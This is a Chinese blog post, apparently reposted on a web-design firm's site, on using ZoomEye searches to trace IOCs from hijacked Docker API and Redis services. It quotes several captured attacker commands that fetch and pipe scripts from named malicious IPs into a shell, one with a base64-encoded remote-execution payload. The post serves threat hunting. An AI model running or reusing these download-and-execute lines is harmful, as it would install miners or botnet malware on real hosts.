大橙子网站建设,新征程启航
为企业提供网站建设、域名注册、服务器等服务
这篇文章给大家介绍ZoomEye中怎么获取IOC,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
创新互联建站网站建设公司是一家服务多年做网站建设策划设计制作的公司,为广大用户提供了成都网站设计、成都网站制作,成都网站设计,广告投放平台,成都做网站选创新互联建站,贴合企业需求,高性价比,满足客户不同层次的需求一站式服务欢迎致电。
最近日常使用ZoomEye搜索一些恶意IOC IP信息时,发现一个现在还在活跃的恶意IP:194.38.20.199 直接在ZoomEye里查询:194.38.20.199 -ip:194.38.20.199解释下:前面那IP当字符串全局匹配,后面的-ip:194.38.20.199的目的是排除掉本身这个IP开的端口服务的一些信息,结果如下图:得到129条结果,其中主要是redis及docker服务:这些都是这个团伙作案遗留下来的痕迹被ZoomEye捕获,从redis记录可以看出来是通过设置 master_host 的方式进行攻击的(参考 https://paper.seebug.org/975/ ),而docker服务通过docker api获取容器信息来看是设置了镜像Command命令实现命令执行:
/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.38.20.199/d.sh | sh;tail -f /dev/null'"
访问确定目前这个IP几服务还是存活状态!很多事情僵尸网络等的自动化攻击都会遗留下很多的攻击痕迹,而这些痕迹可以被网络空间搜索引擎探测捕捉到,比如 https://paper.seebug.org/595/ 再比如 前不久360netlab抓到的一个新的Matryosh僵尸网络通过攻击adb服务进行传播,国外的研究者就发现通过ZoomEye可以捕捉到有意思信息 https://twitter.com/r3dbU7z/status/1356802656493264896我们回到这个主题案例,在这些被入侵的docker api服务里我们可以通过ZoomEye搜索 wget 或 curl 或 apt-get这些痕迹来确定被入侵目标及其他黑客团伙或IOC信息,我们以wget为例子 搜索语法如下:
"Server: Docker" +"Content-Type: application/json" +wget
到目前搜索到71 条结果(注意这个结果可能随时变化这个是因为ZoomEye采用覆盖更新的方式,比如被入侵后恢复正常服务就会被替换)搜索其他团伙或者IOC语法如下:
"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199
排除包含有194.38.20.199的目标,得到19条结果。随便找一个:
"Command":"sh -c 'wget -qO - http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"
找到一个新的34.66.229.152[目前也处于存活状态] 开源威胁情报显示这个是Tsunami的DDOS团伙,我们继续语法:
"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199 -34.66.229.152
得到2条目标,看下banner里的Command信息得到2个恶意IP 45.137.155.55[目前也处于存活状态] 及 209.141.40.190[目前也处于存活状态]
"Command":"/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 45.137.155.55/d.sh | sh;tail -f /dev/null'"
从这个命令格式及d.sh的来看跟 194.38.20.199的很类似,姑且可以归于Kinsing。
"Command":"chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"
看起来又是一个挖矿相关的,所以到目前为止我们通过在Docker API信息里搜索wget最终找到了如下几个恶意IOC:194.38.20.199/45.137.155.55 Kinsing/挖矿34.66.229.152 Tsunami/DDOS209.141.40.190 未知/挖矿当然你还可以通过分析哪些sh脚本提取跟多的IOC IP地址进行关联,这里与主题关系不大就不继续了。
关于ZoomEye中怎么获取IOC就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。